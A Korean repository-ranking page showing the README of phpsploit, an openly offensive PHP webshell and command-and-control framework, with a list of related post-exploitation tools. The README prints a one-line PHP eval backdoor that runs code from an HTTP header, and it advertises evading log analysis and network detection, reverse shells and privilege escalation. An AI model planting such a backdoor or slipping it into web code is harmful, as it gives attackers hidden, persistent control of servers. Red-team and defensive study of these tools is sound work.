랭킹으로 돌아가기

nil0x42/phpsploit

Python

Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor

post-exploitationhackingbackdoorstealthhacktoolblackhatprivilege-escalationphp-backdoorhacking-frameworkwebshelladvanced-persistent-threatredteam
스타 성장
스타
2.5k
포크
470
주간 성장
이슈
26
1k2k
2014년 6월2018년 6월2022년 7월2026년 7월
아티팩트PyPIpip install phpsploit
README

Master


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Created by nil0x42 and contributors


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate privilege-escalation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any option (help command)
    • Cross-platform on both client and server.
    • CLI supports auto-completion & multi-command
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contributors

Thanks goes to these wonderful people:


nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖 🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝

This project follows the all-contributors specification. Contributions of any kind welcome

관련 저장소
sundowndev/hacker-roadmap

A collection of hacking tools, resources and references to practice ethical hacking.

MIT Licensehackinghacking-tool
15.5k1.7k
GTFOBins/GTFOBins.github.io

GTFOBins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.

YAMLGNU General Public License v3.0post-exploitationlinux
gtfobins.org
13.5k1.6k
Manisso/fsociety

fsociety Hacking Tools Pack – A Penetration Testing Framework

PythonPyPIMIT Licensefsocietyexploitation
12.2k2.1k
malwaredllc/byob

An open-source post-exploitation framework for students, researchers and developers.

PythonPyPIGNU General Public License v3.0encrypted-connectionsplatform-independent
9.5k2.1k
n1nj4sec/pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C

PythonPyPIOtherpupypython
9k1.9k
Ne0nd0g/merlin

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

GoGo ModulesGNU General Public License v3.0http2command-and-control
5.6k840
FunnyWolf/Viper

Adversary simulation and Red teaming platform with AI

metasploit-frameworkpost-exploitation
viperrtp.com
5.2k688
nicocha30/ligolo-ng

An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

GoGo ModulesGNU General Public License v3.0redteamtunneling
docs.ligolo.ng
4.8k452
huntergregal/mimipenguin

A tool to dump the login password from the current linux user

COtherpost-exploitationpassword-extraction
4.1k649
EntySec/Ghost

Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device.

PythonPyPIMIT Licenseadbandroid-device
entysec.com
3.4k1.1k
Marten4n6/EvilOSX

An evil RAT (Remote Administration Tool) for macOS / OS X.

PythonPyPIGNU General Public License v3.0ratreverse-shell
2.4k487
byt3bl33d3r/SILENTTRINITY

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR

BooGNU General Public License v3.0security-toolsc-sharp
2.3k427